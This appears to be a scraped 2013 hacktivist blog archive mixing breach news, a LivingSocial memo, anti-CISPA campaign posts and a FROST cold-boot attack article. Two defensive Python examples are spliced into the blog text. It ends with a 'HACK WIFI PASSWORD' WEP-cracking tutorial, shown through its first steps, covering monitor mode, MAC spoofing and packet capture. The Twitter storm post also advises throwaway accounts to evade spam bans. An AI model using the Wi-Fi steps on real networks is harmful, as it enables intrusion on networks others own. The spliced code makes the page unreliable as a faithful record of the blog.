
Saturday, April 27, 2013

LivingSocial Hacked — More Than 50 Million Customer Names, Emails, Birthdates and Encrypted Passwords Accessed (Internal Memo)

LivingSocial, the daily deals site owned in part by Amazon, has suffered a massive cyber attack on its computer systems, which an email from CEO Tim O’Shaughnessy — just sent to employees and obtained by AllThingsD.com — said resulted in “unauthorized access to some customer data from our servers.”
The breach has impacted 50 million customers of the Washington, D.C.-based company, who will now be required to reset their passwords. All of LivingSocial’s countries across the world appear to have been affected, except in Thailand, Korea, Indonesia and the Philippines, as LivingSocial units Ticketmonster and Ensogo there were on separate systems.
One positive note in a not-so-positive situation: The email sent to employees and customers noted that neither customer credit card nor merchant financial information was accessed in the cyber attack.
This is the latest big data breach in the consumer Internet space, which has seen troublesome incursions into some high-profile companies recently, including Zappos, LinkedIn and Evernote.
When asked for comment on the email, a LivingSocial PR spokesman confirmed the attack and that 50 million customers were impacted.
The attack comes at a tough time for the company, since it has been trying to turn itself around after a downturn across the daily deals landscape. LivingSocial got a large cash infusion recently from investors to help staunch its losses. Amazon owns 29 percent of the company.
More to come, but here’s the email sent to employees, including one that will be sent to customers soon:
Re: Security Incident
LivingSocialites –
This e-mail is important, so please read it to the end.
We recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.
Two things you should know:
1. The database that stores customer credit card information was not affected or accessed.
2. The database that stores merchants’ financial and banking information was not affected or accessed.
The security of our customer and merchant information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
To ensure our customers and merchants are fully informed and protected, we are notifying those who may have been impacted via email explaining what happened, expiring their passwords, and requesting that they create new passwords. A copy of the note is included below this email.
If you have any questions or concerns, please visit Pulse – https://pulse.livingsocial.com/intranet/Home/more_updates.html — for a list of frequently asked questions. If you have additional questions that aren’t answered in the FAQs, please submit them via email to XXX@livingsocial.com.
Because we anticipate a high call volume and may not be able to answer or return all calls in a responsible fashion, we are likely to temporarily suspend consumer phone-based servicing. We will be devoting all available resources to our web-based servicing.
I apologize for the formality of this note, which the circumstances demand. We need to do the right thing for our customers who place their trust in us, and that is why we’re taking the steps described and going above and beyond what’s required. We’ll all need to work incredibly hard over the coming days and weeks to validate that faith and trust.
– Tim
Subject: An important update on your LivingSocial.com account
LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.
The database that stores customer credit card information was not affected or accessed.
Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one.
For your security, please create a new password for your < > account by following the instructions below.
1. Visit LivingSocial.com
2. Click on the “Create a New Password” button (top right corner of the homepage)
3. Follow the steps to finish
We also encourage you, for your own personal data security, to consider changing password(s) on any other sites on which you use the same or similar password(s).
The security of your information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
Please note that LivingSocial will never ask you directly for personal or account information in an email. We will always direct you to the LivingSocial website — and require you to login — before making any changes to your account. Please disregard any emails claiming to be from LivingSocial that request such information or direct you to a different website that asks for such information.
If you have additional questions about this process, the “Create a New Password” button on LivingSocial.com will direct you to a page that has instructions on creating a new password and answers to frequently asked questions.
We are sorry this incident occurred, and we look forward to continuing to introduce you to new and exciting things to do in your community.
Tim O’Shaughnessy
CEO, LivingSocial
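
The two controls the notices above rely on, salted password hashes and a forced password expiry, sketched as an added example (not LivingSocial's code; the page does not say which hash function or reset mechanism the company used). The PBKDF2 work factor, the class and method names, and the emailed single-use reset token are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

ITERATIONS = 200_000  # assumption: illustrative PBKDF2 work factor, tune to your hardware


@dataclass
class Credential:
    salt: bytes
    digest: bytes
    expired: bool = False                      # set during breach response
    reset_token_hash: Optional[bytes] = None   # only a hash of the token is kept


def derive(password: str, salt: bytes) -> bytes:
    """Salted, deliberately slow hash of the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


class CredentialStore:
    """Hypothetical in-memory credential store used only for this example."""

    def __init__(self) -> None:
        self.users: Dict[str, Credential] = {}

    def set_password(self, email: str, password: str) -> None:
        # A fresh random salt per user and per change: equal passwords give
        # different digests, so one precomputed table cannot cover all rows.
        salt = os.urandom(16)
        self.users[email] = Credential(salt, derive(password, salt))

    def login(self, email: str, password: str) -> str:
        cred = self.users.get(email)
        if cred is None:
            return "denied"
        if cred.expired:
            # Once expired, the old password is not evaluated at all, so a
            # password guessed from the stolen hashes cannot open the account.
            return "reset_required"
        candidate = derive(password, cred.salt)
        # Constant-time comparison of the digests.
        return "ok" if hmac.compare_digest(candidate, cred.digest) else "denied"

    def expire_all(self) -> int:
        """Breach response: expire every stored password, return the count."""
        for cred in self.users.values():
            cred.expired = True
        return len(self.users)

    def begin_reset(self, email: str) -> Optional[str]:
        """Issue a single-use token; a real system would email it to the user."""
        cred = self.users.get(email)
        if cred is None:
            return None
        token = secrets.token_urlsafe(32)
        cred.reset_token_hash = hashlib.sha256(token.encode()).digest()
        return token

    def complete_reset(self, email: str, token: str, new_password: str) -> bool:
        cred = self.users.get(email)
        if cred is None or cred.reset_token_hash is None:
            return False
        presented = hashlib.sha256(token.encode()).digest()
        if not hmac.compare_digest(presented, cred.reset_token_hash):
            return False
        # Replaces the record: new salt, new digest, not expired, token gone.
        self.set_password(email, new_password)
        return True


if __name__ == "__main__":
    store = CredentialStore()
    store.set_password("user@example.test", "old passphrase")  # constructed sample
    print(store.login("user@example.test", "old passphrase"))  # before the breach
    store.expire_all()
    print(store.login("user@example.test", "old passphrase"))  # after expiry
    tok = store.begin_reset("user@example.test")
    store.complete_reset("user@example.test", tok, "a brand new passphrase")
    print(store.login("user@example.test", "a brand new passphrase"))
```

The salt stops identical passwords from sharing a digest, but it does not slow guessing against a single stolen row; that is the job of the work factor and the reason the old passwords are expired.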

Thursday, April 25, 2013

Arrested Hacker Trolls Australian Feds, Claims to be "Leader of LulzSec"

Arrested "hacker" had a flashy desk job; Anonymous laughs at his wild claims

"It seems you have been living..two lives. In one life, you're Thomas A. Anderson, program writer for a respectable software company....you pay your taxes, and you...help your landlady carry out her garbage. The other life is lived in computers, where you go by the hacker alias...and are guilty of virtually every computer crime we have a law for."
--The Matrix (1999)

I. Sydney Police Catch Corporate Man Moonlighting as a "Hecker"

That quote echoes the situation that a senior staffer at a "prominent" IT firm finds himself in after he was apprehended Monday evening by Australian Federal Police (AFP) following his alleged defacement of an Australian federal government website.  The AFP warns that hacking isn't just "harmless fun" and that they'll hunt down lawbreakers.

The alleged hacker -- or "hecker" as Anonymous sometimes says -- has been released on bail and will be tried in Woy Woy Local Court in Sydney on three computer crimes charges:
 

Two counts of unauthorised modification of data to cause impairment, contrary to section 477.2 of the Criminal Code Act 1995; and

One count of unauthorised access to, or modification of, restricted data, contrary to section 478.1 of the Criminal Code Act 1995.

The Australian Federal Police have caught themselves a hecker.
[Image Source: The Daily Telegraph]

The maximum penalties for the offenses are two years and ten years, respectively.

II. Suspect Claims to be King of LulzSec, Australian Police Get Excited

Authorities report that the man made the astounding claim to be the "leader of LulzSec".  You may recall that LulzSec was the group that in 2011 hacked Sony Corp. (TYO:6758) several times and also breached government sites.  Most of the folks from LulzSec are already in custody or in prison.  And most sources indicate that hacker-turned-double agent for the U.S. federal government Hector Xavier Monsegur (handles: "Sabu", "Xavier DeLeon", and "Leon") was the group's true leader.

Usually when a real LulzSec leader/hacker gets arrested, there's major Twitter traffic, with members of LulzSec parent hacker league Anonymous confirming the validity of the claim.  In this case, it appears the AFP -- and the members of the media who unquestioningly carried their claims -- have been duped.  The local Anonymous branch's Twitter account carried the disclaimer:
So it sounds like the hacker may either have been looking to get famous on the internet or simply trolling the Australian police.  Either way, they bit, parroting his claims proudly at their press conference.

It appeared the AFP were trolled. [Image Source: LulzSec]

This isn't the first time hackers have made a mockery of the Australian feds.  Back in 2009 they claimed to be hack-proof, a claim which earned them a prompt hacking by Anonymous.

https://www.facebook.com/YourAnonymoNews

Wednesday, April 24, 2013

The Internet’s Own Boy




An investigative documentary from director Brian Knappenberger about the life of the internet pioneer and activist Aaron Swartz.
  • Launched: Apr 24, 2013
  • Funding ends: May 24, 2013

Currently titled “The Internet’s Own Boy,” the new film by Brian Knappenberger, director of “We Are Legion: The Story of the Hacktivists,” follows internet activist and programming pioneer Aaron Swartz from his teenage emergence on the internet scene and involvement in RSS and Reddit, to his increased interest in political advocacy and the controversial actions he allegedly took in downloading nearly four million academic articles from the online service JSTOR. The film explores Aaron’s arrest, the prosecution’s tactics in bringing the case to trial through the Computer Fraud and Abuse Act, the CFAA, and the impact a seemingly small hacking gesture had on Aaron’s life and the future of information access on the internet.
WE NEED YOUR HELP!  Independent documentaries created outside the studio or traditional broadcast system face an uphill battle getting made and distributed.  If we are able to raise the funds we need for this film, we hope to get creative with how we bring it to audiences.  In addition to finding as many new ways as possible to share the final documentary, we have decided in the spirit of open access to release the film digitally through a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.  Aaron gave a lot of his time and energy to Creative Commons.  We also hope to find other outlets as well as live screenings, a small theatrical run and bringing it to college campuses and libraries.  We think this is the best way to share this powerful story!
HELP US MAKE IT HAPPEN!  Any contribution gets us closer to the goal.  Obviously the way it works with Kickstarter, if we don't make the goal we don't get anything.
Director Brian Knappenberger
A lot has been written about Aaron, some of it very good, but I felt that taken as a whole it represented a fractured picture of him. I wanted to hear from the people who knew him, explore each chapter of his life and go through his numerous video appearances to have him tell his own story as much as possible. I was well aware of Aaron long before the news broke. I happened to be attending a social computing conference in New York at the time and surrounded by dozens of people who knew Aaron personally. Through their stories it became immediately clear how many diverse corners of the internet Aaron's work touched. A few days into the conference I started recording people’s memories of him on camera, and weeks later I knew I had to go deeper to fully understand what caused such an accomplished and inspired person to take his own life. As became obvious in "We Are Legion" many internet activists are so frustrated with existing systems that they consider them unfixable. But Aaron didn’t fit into this category. Countless friends describe him as someone who wanted to work within the system, to “hack” or use new tools to fix problems in our society – everything from internet freedoms to health care. 
This documentary is an opportunity to explore the influence one incredibly talented programmer and celebrated internet visionary had on the discussion of information access, what his involvement in such a volatile subject means for all internet users, and what his trial has shown us about the cracks in an outdated legal system that lead to such tragic consequences.
WE HAVE ALSO DECIDED AFTER THE FILM IS COMPLETED TO RELEASE THE RAW INTERVIEW FOOTAGE AND POST IT TO THE INTERNET ARCHIVE IN SAN FRANCISCO THROUGH A SIMILAR CREATIVE COMMONS LICENSE.  
“The Internet’s Own Boy” is currently in production. Money raised will go towards setting up further shoots, conducting interviews, facilitating research and collecting archival footage. The project also reunites Knappenberger with We Are Legion: The Story of the Hacktivists soundtrack composer John Dragonetti, who will compose an original score for the film.
YOUR CONTRIBUTIONS ARE CRITICAL to bringing this powerful story to a wider audience!
We anticipate the full film will cost us around $175K to complete, not including distribution, so this is just our first round of asking for funding. We may be back for finishing funds!  Anything from $5 to $5,000 helps and is HUGELY appreciated!
Many thanks for helping us tell this incredible story. It is a significant and poignant chronology of Internet history.

Risks and challenges

There are risks inherent in any film made outside the studio system. Mostly that's because the elements are many, including initial research and investigation, archival and original footage and interviews, soundtrack creation, final polishing with color correction and sweetening and then the many facets of distribution to a large audience. Because of Luminant Media's huge experience, we feel like this project has an excellent chance of being completed and going on to screen to huge numbers of people. Dir Brian Knappenberger has an enormous documentary track record.
We are firm believers in the power of independent documentaries. So far we have had such a huge outpouring of people interested in being a part of the documentary (and are truly grateful for their support) that we feel like we are well on the way to making a great and historically important film.
Many thanks!
The Luminant Media team
WE NEED YOUR HELP!

Tuesday, April 23, 2013

Twitter storm v1.0 for #StopCISPA April 24, 2013

    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #          Twitter storm v1.0 for #StopCISPA            #
    #                                                       #
    #             Date:        April 24, 2013               #
    #             Time:          8:00PM GMT                 #
    #                            4:00PM EDT                 #
    #                            1:00PM PDT                 #
    # Goal: Trend #StopCISPA top 5 worldwide, #1 in the US  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    # Twitter account of Senate members for directed tweets #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
             @Barbara_Boxer (D-Cali) Barbara Boxer
             @PorkBarrel (R-Okla) Tom Coburn
             @SenatorCollins (R-Maine) Susan Collins
             @JohnCornyn (R-Texas) John Cornyn
             @JimDeMint (R-S.C.) Jim DeMint
             @ChrisDodd (D-Conn) Chris Dodd
             @DickDurbin (D-Ill) Richard Durbin
             @JohnEnsign (R-Nev) John Ensign
             @ChuckGrassley (R-Iowa) Charles Grassley
             @JimInhofe (R-Okla) James Inhofe
             @ClaireCMC (D-Mo) Claire McCaskill
             @SenatorMendez (D-N.J.) Bob Menendez
             @SenJeffMerkley (D-Ore) Jeff Merkley
             @MarkUdall (D-Colo) Mark Udall
             @TomUdall (D-N.M.) Tom Udall
             @MarkWarner (D-Virg) Mark Warner
             @RogerWicker (D-Miss) Roger Wicker
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #   Avoid the Twitter spam ban! Send tweets 2 minutes   #
    #   apart. Send to no more than three @users at a time  #
    # Create a temporary twitter account if you are worried #
    #      about a suspension on your main account!         #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #  Tweet Ideas. Be sure to add #StopCISPA for your own  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * CISPA is a violation of my INALIENABLE right to privacy #StopCISPA
    * CISPA allows our information to go to agencies who don't care about our privacy. https://eff.org/CISPA  #StopCISPA
    * We can't have security without privacy. Help us defend the Internet from CISPA! https://eff.org/CISPA  #StopCISPA
    * Preserve privacy and liberty on the Internet. https://eff.org/CISPA  #StopCISPA
    * What have you done to #StopCISPA today? https://cyberspying.eff.org/
    * Does the military really need to know I signed up for Google+ when it first came out, but haven’t posted since? #StopCISPA https://eff.org/r.1X2
    * #CISPA Allows data shared with the government to be used for purposes unrelated to cybersecurity #StopCISPA
    * A free and open internet depends on more privacy, but CISPA gives us less. #StopCISPA https://eff.org/CISPA
    * CISPA sacrifices liberty without improving security. We deserve both. https://eff.org/CISPA #StopCISPA
    * Does the government REALLY want to know what porn I look at? Why? Can't find your own? #StopCISPA
    * Please preserve privacy and liberty on the Internet. #StopCISPA
    * We need a judge's oversight to protect our privacy and a number of other rights. #CISPA removes this #StopCISPA!
    * Lawmakers are pushing a dangerous bill that would threaten Americans' privacy while immunizing companies from any liability. #StopCISPA
    * CISPA resembles a modern, capitalistic version of govt & industry practices once common in the (former) USSR. #StopCISPA
    * If you take ALL my privacies away, we may as well ban the use of clothing too! #StopCISPA
    * #StopCISPA because our privacy and freedom of speech are not for sale to corporate lobbyists!
    * Privacy is SACRED! #CISPA will KILL it! Companies won't be required to strip private info of online users. #StopCISPA
    * Do you want to allow the government the ability to monitor your #FAP sessions? I sure don't! #StopCISPA
    * Not only will this bill infringe upon the rights of US citizens, it will infringe upon the rights of all persons #StopCISPA
    * #CISPA is a violation of the EU privacy and human rights law, it violates international law, and the constitution #StopCISPA
    * A yes vote for this bill, is a no vote for freedom #StopCISPA
    * #StopCISPA Explainer #4: Is There Anything Besides  Information-Sharing Hidden in CISPA? Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-4-there-anything-besides-information
    * #StopCISPA Explainer #3: "What Can Be Done With  Information After It Is Shared?" Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-3-what-can-be-done-information-after
    * #StopCISPA explainer #2 "Who can info be shared with?"  Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-2-whom-can-information-be-shared
    * #StopCISPA explainer #1 "What Information Can Be  Shared?" Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-1-what-information-can-be-shared
    * Join millions of your fellow citizens online and protest against the passage of this bill #StopCISPA
    * Protect the freedoms of future generations, make sure they have a right to privacy! #StopCISPA
    * Join the @ACLU and the @EFF and protect the right to privacy! #StopCISPA
    * Google, Microsoft and Facebook have no business reporting my activity online to the FBI #StopCISPA
    * The government wants to read my naughty emails?! Fuck That!! #StopCISPA
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #                  Directed tweet ideas.                  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * Your support of CISPA shows your hypocrisy, asking everyone else to  give  up their right to privacy, while you remain able to hold onto  yours. #StopCISPA
    * We're not going to sacrifice all of our liberties for the illusion of safety. #StopCISPA
    * #CISPA overrides existing privacy law, and grants broad immunities to participating companies. #StopCISPA
    * We are deeply unhappy that the House passed #CISPA to destroy everyone's online and by extension offline privacy. #StopCISPA
    * Is this the USA or the Republic Of China? #StopCISPA
    * Until the iron curtain fell, the US Govt & commerce opposed this sort of paranoid-based privacy infringement #StopCISPA
    * #StopCISPA because patriotic Americans oppose secretive & cozy anti-public relations between commerce & the government.
    * Why are you denying me my inalienable rights that have been guaranteed to me in the constitution? #StopCISPA
    * The US government has no rights to monitor my private life, or my activities, this bill is fundamentally flawed. #StopCISPA
    * A yes vote today, means a no vote tomorrow for you, all politicians that support this will be voted out of office #StopCISPA
    * Do you enjoy your cozy 6 figure a year job? #StopCISPA and keep it, vote yes and be voted out!
    * If you vote yes on #CISPA, may I come over to your place and watch you piss? #StopCISPA
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #      Tweet ideas calling for an internet blackout       #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * It's time for a #StopCISPA blackout on the order of the #SOPA protests @Google @ericschmidt @Wikipedia @reddit
    * Protest against the passage of #CISPA #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Collusion in the business of mass surveillance violates privacy #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Companies need no law granting them violation of privacy #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Private emails, cloud data, and social media are all affected #StopCISPA @Google @ericschmidt @Wikipedia @reddit


    https://www.facebook.com/YourAnonymoNews


    https://pbs.twimg.com/media/BIh6RN8CcAAi8qi.jpg:large

Monday, April 22, 2013

How to bypass an Android smartphone’s encryption and security: Put it in the freezer

Galaxy Nexus, in the freezer, about to cough up its encryption keys via a cold boot attack


Security researchers at the University of Erlangen-Nuremberg in Germany have shown that they can extract photos, surfing history, and contact lists from Android smartphones, even if the phone is locked and the disk is encrypted. The software, called FROST, has been open-sourced by the researchers and is reasonably easy to use, if you’re interested in replicating the results. There is a caveat, though: As the name suggests, you need to put the phone in the freezer first.
The attack vector used by Tilo Müller, Michael Spreitzenbarth, and Felix Freiling is referred to as a cold boot attack. Cold booting (or hard booting) is where you reboot a system by cutting the power completely, and then turning it back on. When you restart a computer normally (i.e. a warm reboot), there are usually processes in place that clear/sanitize the system’s memory — but by cold booting and bypassing these processes, the contents of any RAM are preserved.
RAM slowly losing data integrity, as recovered by FROST
Six successive RAM dumps from a Galaxy Nexus, as its RAM slowly loses data integrity.
“But RAM is volatile,” you decry. “RAM loses its data as soon as power is cut,” you plead — and yes, to an extent, you are right. RAM is volatile, and it does require regular spikes of power to retain its data — but when power is cut, it actually takes a few seconds or minutes for the data to be lost. If you have some way of reading the RAM, you can extract all sorts of sensitive information — most notably, the encryption key used to encrypt the local hard drive or flash storage. This fault (feature?) is called data remanence, and it also refers to the tendency for hard drives and other magnetic media to preserve data, even after being wiped.
Recovering FDE encryption keys, with FROST
Reading RAM is difficult, though. In the case of larger computers, you can physically transplant the stick of RAM into another computer, and read off the memory contents there. With embedded devices, such as smartphones, you don’t have that option — which is where FROST (Forensic Recovery Of Scrambled Telephones) comes in. In short, FROST is an Android recovery image — a lot like ClockworkMod — that gives you access to any data stored in RAM after a cold boot. From the main FROST menu, you can attempt to recover the full-disk encryption (FDE) keys from RAM, or simply dump the entire contents of RAM via USB to another PC for further analysis. (See: Full disk encryption is too good, says US intelligence agency.)
A Galaxy Nexus in the freezer, preparing to give up its encryption keys
Now, as we mentioned, it can take anywhere from a few seconds to a few minutes for RAM to lose its data. One of the variables that causes this variance is temperature; by cooling RAM down, it preserves data for longer. In one particularly awesome research paper [PDF], liquid nitrogen has been shown to preserve DRAM contents for an entire week. In this particular case, though, the security researchers placed a Samsung Galaxy Nexus into a freezer for an hour, until the phone’s internal temperature dropped to 10C (50F). Then, by quickly removing and inserting the battery (it must be done in under 500 milliseconds), and entering FROST, they were able to make a complete dump of the phone’s RAM. Without the freezer, the phone’s RAM would lose its data before it could be recovered.
While FROST is notable as the first successful example of a cold boot attack on Android, FROST is just the latest in a long line of cold boot attack tools. In a world where full disk encryption is the norm rather than the exception in criminal circles, the ability to recover encryption keys from memory is of vital importance to the FBI, CIA, and other intelligence agencies around the world. It is now standard practice for some police forces to absolutely make sure that computers are not turned off during raids, until they have been fully scanned for encryption keys and any other data that might still be in RAM. There are defenses that can be employed against cold boot attacks, such as not storing encryption keys in RAM, but for now it seems that Android at least is still vulnerable.
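
To put numbers on the data remanence described above, for example when testing how long a device you own retains memory after power loss, successive dumps can be compared against a known reference pattern. The following is an added example, not part of FROST or of the original article: it measures bit error rate and flip direction per dump and fits a retention time constant. The decay model (set bits fall to 0 independently), the delays and the warm and cold time constants are constructed values, not measurements; real DRAM also has regions whose ground state is 1.

```python
import math
import random
from dataclasses import dataclass
from typing import List, Sequence

CHUNK = 4096                                  # bytes compared per step
DELAYS = (0.0, 0.5, 1.0, 2.0, 4.0, 8.0)       # constructed: six dumps, seconds


@dataclass
class DumpStats:
    delay_s: float
    total_bits: int
    ref_ones: int        # bits that were 1 in the reference pattern
    one_to_zero: int     # bits that decayed 1 -> 0
    zero_to_one: int     # bits that flipped 0 -> 1

    @property
    def error_rate(self) -> float:
        return (self.one_to_zero + self.zero_to_one) / self.total_bits

    @property
    def surviving(self) -> float:
        """Fraction of the originally set bits that are still set."""
        return 1.0 - self.one_to_zero / self.ref_ones


def compare_dump(delay_s: float, reference: bytes, dump: bytes) -> DumpStats:
    """Count bit flips, by direction, between the reference and one dump."""
    if len(reference) != len(dump):
        raise ValueError("reference and dump must be the same size")
    ones = o2z = z2o = 0
    for off in range(0, len(reference), CHUNK):
        ref = int.from_bytes(reference[off:off + CHUNK], "big")
        got = int.from_bytes(dump[off:off + CHUNK], "big")
        diff = ref ^ got
        ones += bin(ref).count("1")
        o2z += bin(diff & ref).count("1")   # differing bits that were 1
        z2o += bin(diff & got).count("1")   # differing bits that are now 1
    return DumpStats(delay_s, len(reference) * 8, ones, o2z, z2o)


def decay_step(image: bytes, survive: float, rng: random.Random) -> bytes:
    """Toy model (assumption): each set bit survives with probability
    `survive`, otherwise falls to 0; cleared bits stay cleared."""
    out = bytearray(image)
    for i, byte in enumerate(out):
        for bit in range(8):
            mask = 1 << bit
            if byte & mask and rng.random() >= survive:
                byte &= ~mask
        out[i] = byte
    return bytes(out)


def simulate_series(tau: float, seed: int,
                    delays: Sequence[float] = DELAYS,
                    size: int = 4 * CHUNK) -> List[DumpStats]:
    """Build a constructed reference image and successive decayed dumps."""
    rng = random.Random(seed)
    reference = bytes(rng.getrandbits(8) for _ in range(size))
    image, prev, stats = reference, 0.0, []
    for t in delays:
        image = decay_step(image, math.exp(-(t - prev) / tau), rng)
        stats.append(compare_dump(t, reference, image))
        prev = t
    return stats


def estimate_tau(stats: Sequence[DumpStats]) -> float:
    """Least-squares fit of ln(surviving) = -t / tau through the origin."""
    num = den = 0.0
    for s in stats:
        if s.delay_s > 0 and s.surviving > 0:
            num += s.delay_s * math.log(s.surviving)
            den += s.delay_s ** 2
    if den == 0 or num >= 0:
        raise ValueError("no measurable decay in this series")
    return -den / num


if __name__ == "__main__":
    for name, tau in (("warm", 2.0), ("cold", 20.0)):   # constructed constants
        series = simulate_series(tau, seed=1)
        for s in series:
            print(f"{name} t={s.delay_s:>4}s error={s.error_rate:.4f} "
                  f"1->0={s.one_to_zero} 0->1={s.zero_to_one}")
        print(f"{name} fitted time constant: {estimate_tau(series):.2f}s")
```

With real dumps, replace `simulate_series` with images read from disk and pass them to `compare_dump` with the measured power-off delay.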


This website is offline in protest of CISPA

An archived screenshot in PNG with a list of websites that have pledged to join the #CISPAblackout.



http://i.imgur.com/eKcTGCg.jpg




Wednesday, April 17, 2013

No Digital Big Brother: Keep the Military Out of Your Email

This is it: after months of pitched battles, the Senate is set to vote on cybersecurity this week. Hundreds of thousands of Internet users have spoken out, and Senators listened. The Cybersecurity Act of 2012 has privacy safeguards that don’t exist in any other cybersecurity bill.
But everything could change in the next 5 days.


Here’s what we have to do to defend privacy

  1. Amend the bill to put in stronger safeguards for privacy. The Franken-Paul amendment would ensure that companies do not have new, overbroad authority to monitor and even block our private communications. Senator Wyden has also sponsored an amendment to promote location privacy. We’ve got to rally together to pass these privacy protections, especially the Franken-Paul Amendment.
  2. Stop attempts to remove the privacy protections. Some Senators are pushing an anti-privacy agenda that could undo months of effort. Senators John McCain and Kay Bailey Hutchison have put forth amendments to hand the reins of America’s cybersecurity systems to military intelligence agencies like the National Security Agency—the very agency responsible for the warrantless wiretapping program instituted under the Bush administration. They want to undo all the privacy protections we’ve won and turn the Cybersecurity Act of 2012 into another Big Brother Bill, just like CISPA in the House.
  3. Keep opposing the bill. We need to make it clear to Senators in every state that Internet users everywhere oppose this bill. It’s dangerous and it’s unnecessary.

How we can do it

Together, we’ve generated tens of thousands of emails against this bill. But now it’s too late for emails.

Phone calls.

We need to generate thousands of calls.  The American Library Association has an awesome tool that will call your phone for you, give you talking points, and connect you to your Senators. Visit ALA now.

Twitter.

When we launched our Congressional Twitter Handle Detection Tool to fight CISPA, the results were extraordinary. Now we’re bringing it back for the newest fight in the cybersecurity debate. Tweet at your Senator now.

See cyberspying.eff.org for the latest alerts!

Spread the word. 

We need to get the word out to as many people as possible. Will you share this page?
This is our last chance to stop them. Join EFF, the American Library Association, Fight for the Future, Demand Progress and others in calling on the Senate to stand up for privacy. Tell your Senators to support the Franken-Paul Amendment and other amendments to support privacy, reject anti-privacy proposals, and oppose the Cybersecurity Act as a whole.

Under CISPA, Google, Facebook, Twitter, Microsoft, others can't promise to protect your privacy

Major technology and Web companies — not limited to Google, Facebook, Twitter and Microsoft — will not be allowed to promise to protect users' privacy should CISPA pass Congress.
CISPA will soon be voted on in the coming few weeks.
For those out of the loop, CISPA will allow private sector firms to search personal and sensitive user data of ordinary U.S. residents to identify this so-called "threat information", and to then share that information with each other and the US government — without the need for a court-ordered warrant.
Under a new amendment voted on earlier today in the U.S. House [PDF], U.S. companies would have been able to keep their privacy policies intact and their promises valid, including terms of service, legally enforceable in the future.

But the Republicans narrowly failed to get it through by a 5-8 vote to reject the amendment.
According to CNET's Declan McCullagh, Rep. Pete Sessions (R-TX), who chairs the House Rules Committee, urged his colleagues to reject the amendment. And they did. All Republican members of the committee voted against, despite a unanimous show of support from the Democratic membership.
It would have allowed companies to make promises to their customers not to voluntarily share their data with other private firms or the U.S. government under the law, which would have been legally valid and enforceable in court.
It means that those who signed up to services under the explicit terms that data would not be shared — with perhaps the exception of the U.S. government if a valid court order or subpoena is served — would no longer have such rights going forward.
The amendment would have weakened CISPA's position. Now it gives these private firms watertight legal immunity under CISPA to share their customer and user data with other firms and the U.S. government, by being "completely exonerated from any risk of liability," according to Rep. Jared Polis (D-CO) speaking to our sister site CNET.
This gives private sector firms the right to share private user data, such as emails, text messages, and cloud-stored documents and files, with the U.S. government and its law enforcement and intelligence agencies, while circumventing existing privacy laws.
Today, the White House threw its weight behind a threat that would see CISPA, known by its full title as the Cyber Intelligence Sharing and Protection Act, vetoed by President Obama should it pass his desk.
A vote on CISPA will go ahead on the House floor either on April 17 or April 18.

Tuesday, April 16, 2013

HACK WIFI PASSWORD WITH BACKTRACK 5

WARNING: Don't hack any router you are not authorized to test; otherwise you'll be put into jail.
 
Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • Here is a link to download it: http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network
    • Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

